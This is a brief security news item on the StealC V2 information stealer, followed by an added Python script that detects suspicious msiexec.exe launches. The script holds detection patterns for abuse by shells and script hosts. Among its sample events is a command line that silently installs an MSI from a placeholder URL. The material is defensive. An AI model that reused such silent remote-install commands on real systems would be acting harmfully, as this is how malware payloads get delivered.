More advanced StealC malware emerges

Increased payload delivery sophistication and additional stealth have been introduced in the latest version of the StealC information-stealing malware, reports GBHackers News.

Beyond an overhauled control panel that lets operators customize payload delivery for more targeted intrusions, StealC V2 adds RC4 encryption, server-side brute-forcing, multi-monitor screenshot capture, and a unified file grabber, while dropping the anti-virtual-machine checks and third-party DLL downloads of its predecessor, according to findings from Zscaler. Further analysis of the updated payload showed Themida-based obfuscation with a two-stage deobfuscation procedure, as well as covert execution of MSI files via msiexec.exe for more refined payload execution. StealC V2 also sends JSON requests carrying unique random parameters to evade static signatures. Its operators continue to develop it actively, which makes mitigation increasingly challenging, Zscaler researchers said.
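The covert use of msiexec.exe to run MSI packages is the behaviour on this page most readily turned into a detection. The example below is added here and is not code from the article, from Zscaler, or from any StealC sample; it applies a set of generic heuristics (scripting-host parent, package path in a user-writable directory or fetched from a URL, silent-install flags) to constructed process-creation events in the style of Sysmon Event ID 1. The field names, the thresholds and the sample events are assumptions, and the rules are not a StealC-specific signature.

```python
"""Heuristic flagging of suspicious msiexec.exe launches from process-creation events.

Added illustration: generic msiexec abuse heuristics, not a StealC signature.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed field set, modelled on Sysmon Event ID 1)."""
    parent: str    # full path of the parent image
    image: str     # full path of the created process
    cmdline: str   # command line of the created process


# Shells and script hosts that rarely install MSI packages in normal operation.
SCRIPTING_PARENT = re.compile(
    r"(?i)\\(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\.exe$"
)
# Package locations a user (or a dropper running as the user) can write to.
USER_WRITABLE = re.compile(r"(?i)(\\appdata\\|\\temp\\|\\downloads\\|\\public\\|\\programdata\\)")
# msiexec accepts a URL as the package path; installs from the web are rare in managed environments.
REMOTE_MSI = re.compile(r"(?i)\bhttps?://\S+")
# Silent / no-UI switches: /q, /qn, /qb, /quiet.
QUIET_FLAGS = re.compile(r"(?i)(?:^|\s)/(?:q[nb]?|quiet)(?=\s|$)")


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the heuristic reasons an msiexec launch looks suspicious (empty list = nothing flagged)."""
    if not ev.image.lower().endswith("msiexec.exe"):
        return []
    reasons = []
    if SCRIPTING_PARENT.search(ev.parent):
        reasons.append("launched by a shell or script host")
    if REMOTE_MSI.search(ev.cmdline):
        reasons.append("package fetched from a URL")
    if USER_WRITABLE.search(ev.cmdline):
        reasons.append("package in a user-writable directory")
    if QUIET_FLAGS.search(ev.cmdline):
        reasons.append("silent install flag")
    return reasons


def detect(events: list[ProcessEvent], min_signals: int = 2) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for events with at least `min_signals` independent indicators.

    Requiring two signals keeps ordinary installs (explorer.exe launching a vendor MSI
    from Program Files, or the msiexec service itself) from producing alerts.
    """
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= min_signals:
            hits.append((i, reasons))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi"'),
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /V"),   # the Windows Installer service starting normally
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\update.msi /qn"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\msiexec.exe",
                 r"msiexec /q /i http://placeholder.invalid/pkg.msi"),  # placeholder host
]

if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {ev.cmdline}\n  -> " + "; ".join(why))
```

Run as a script it prints the two flagged launches with their reasons; the two benign events score zero. In a real deployment the same heuristics map onto a SIEM rule over process-creation telemetry, with the parent-process and path lists tuned to what is normal for the environment.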
